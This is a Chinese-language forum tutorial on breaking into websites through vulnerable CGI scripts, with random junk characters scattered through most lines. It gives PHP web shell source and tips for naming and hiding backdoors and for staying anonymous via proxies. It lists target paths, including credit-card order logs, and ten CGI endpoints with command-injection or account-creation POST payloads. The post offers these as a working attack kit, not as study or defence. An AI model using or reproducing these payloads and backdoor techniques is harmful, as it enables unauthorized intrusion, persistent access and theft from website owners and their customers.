CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
: z6 M/ ?* Z3 f9 G大家好 我是bboyhip  只是一名菜菜的exploiter
" h1 a. Y* K1 W9 X. T很开心来到贵论坛
( t3 r- ?# v( U这里让我感觉 很有技术交流的感觉
  y' R# C) k: j8 z我会长长来玩的
前言:
% Q  ~8 k: _( |, T- B以下讲解针对欧美日本网站
* C% S- @( s3 Y: ^: `當我們在做滲透分析的時候 方法有很多
0 N* ^8 V" w% N/ e4 O* V我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
+ X3 d! D) c5 H9 M目录为/cgi-bin/

只是个人在实务上一些经验
' p5 W' @6 P' W写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
讲解一下
让没有基础的人很容易上手
8 ~0 j5 ^& L, s: y
1 |/ J% _" Z1 N) @9 i以下内容跟帖回复才能看到
$ p7 ?( O7 k! z! D' z) q! X, {( j==============================
' e) I% u5 O8 n2 D# M
第1部份: 何谓Shell?
0 p  I2 o1 I) x  }9 \! ZShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
5 X5 A; L" \' ]" M0 R9 b6 v- G
+ k# T' [- ?; E. L" m1 l对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
# r% `) [* i3 S/ D- Q' k  y- M7 M要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
& J# \7 T( X5 S% R& ]" ]所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

第2部份: Unix 指令
6 V2 A( i3 h! i以下是一些常见及重要的指令:
% ^, k. {; H* R- ]0 t; }pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
/ l+ q3 v) y! Z0 B# W" t' e* f( q# fls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
3 D% L! Q7 d+ v: vls /: 列出根目录
: N. D6 Z7 O) h* L; c( Dls /etc: 列出/etc的资料夹及档案
$ f7 J$ u% B. d9 R# M- ~% fls ../ -al: 详细列出上一层的资料夹及档案
cat: 显示档案内容
8 W  ^( K9 m+ [  `1 l+ _0 G# ocat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
& ?8 d1 ^  K% W; c, J/ c0 B' v& \2 mcat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
man: 显示指令用法  
man ls: 显示ls这指令的用法  
mkdir 建立目录
9 C6 l, d. @: j4 X8 [  G2 E6 yrmdir 删除目录
; f' i4 i! i% wmv 移动档案
. z3 [% e0 l2 Frm 删除档案
% @  o  q  P+ o1 k6 P/ u3 B& y
/ l; I, }$ v) q) m2 f/ ?第3部份: Shell的使用
+ {% A% d7 i9 w1 _  ?例如:
http://site.com/refer.php
: m7 H" w$ }- _" }& G' Y) |8 P这是我的後门, 原代码如下:
4 z& P7 ?5 h& Q  F( p<Form Action="#" Method="POST">
% ~. C2 W  F, ]2 ]! i<Input type="text" name="cmd">
; F: y5 m  B: h<Input type="Submit">
- H$ T, d5 P. E) s" x* l& o+ C6 c</Form>
2 E# V  S1 m; T- e<?php
$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
?>
输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

% l6 n' G' P; [5 n) N. u第4部份: 注意事项
- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
8 }0 B2 M( y/ B6 L+ j. c- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
) g; z+ |$ l* N7 h- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
: J* g( W) U1 q  S: k不容易被发现.
! I) \7 i: J& _8 w' z& q$ f$ D1 T# s- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
  A, C; N  g4 G* q4 X/ o  U: H# s2 b, R针对网站的渗透分析方法太多了
3 J9 u  D  ~2 C, I这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
8 v" v+ g, X/ w! g开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下
) m# l* y( |! ]+ \9 i/ a
. m; [0 F7 N: o. w5 T; ?" Y1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
扫洞工具 如:triton..等等
' q# P+ ?* H, a; `( T9 UE表
9 p1 D! J1 q" {' q& R如
! @8 \" ~, D' p  a2 x4 X% c2 Q/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
2 Y& B, k( @3 j5 d6 E/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
$ W5 a7 E& h- r( L, z/ aE表来源可以是网路收寻或是自己的0 day

9 B3 O3 U* k8 t2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
$ m) k( e9 J9 x一般都是在IE里先看一下的,记住这个返回码哦
5 J! f% |' H& g% A0 j( mERROR:This script should be referenced with a METHOD of POST.
" W1 E5 R* K8 t$ _+ E没有返回一定是假的
3.重来来了 很多人都会问我
1 _: J" j: U: O! m" J: b/ f' F& I他扫到很多洞 但是不会使用
, x8 x! l% ?) ?5 e因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
' u. _# x# H% ^8 f5 Z: n+ }& d2 J可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等
5 o1 g& |1 F( {2 l! X* {6 {2 t
5 ~/ u' Z: x9 `" n- A6 X, z, v: C以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
/index.cgi
. r' h4 G- m9 c& cwei=ren&gen=command
1 t+ a' J1 ^4 k& M/passmaster.cgi
  d- }% n9 p3 z3 e4 l: xAction=Add&Username=Username&Password=Password
/accountcreate.cgi
4 \$ s  n" l* Husername=username&password=password&ref1=|echo;ls|
% l/ W3 s# F, f& a/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
$ t1 d9 g* p. W$ I/ \; {5 {0 P/addusr.pl
  C  b- s3 i$ O/cgi-bin/EuroDebit/addusr.pl
" ]; A0 c& q$ U% _5 D% M. A- luser=username&pass=Password&confirm=Password
  @: h& f! `- |2 T1 G( q* u% t* V4 Z/ccbill-local.asp
8 j+ E& C( Y" e: s, ppost_values=username:password
, ~) Q, k& D4 C/count.cgi
pinfile=|echo;ls -la;exit|
. W0 K; `  x) \  _/recon.cgi
- f$ n' i) n+ Y- o2 h/recon.cgi?search
) e2 ]- z; D" d' Z5 R( w$ usearchoption=1&searchfor=|echo;ls -al;exit|
0 s5 X+ e( y4 N6 N% k/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
' f! G3 N' t' H0 M/ r8 {/af.cgi_browser_out=|echo;ls -la;exit;|

( W  v+ `) [* R% i今天就讲到这  感谢大家支持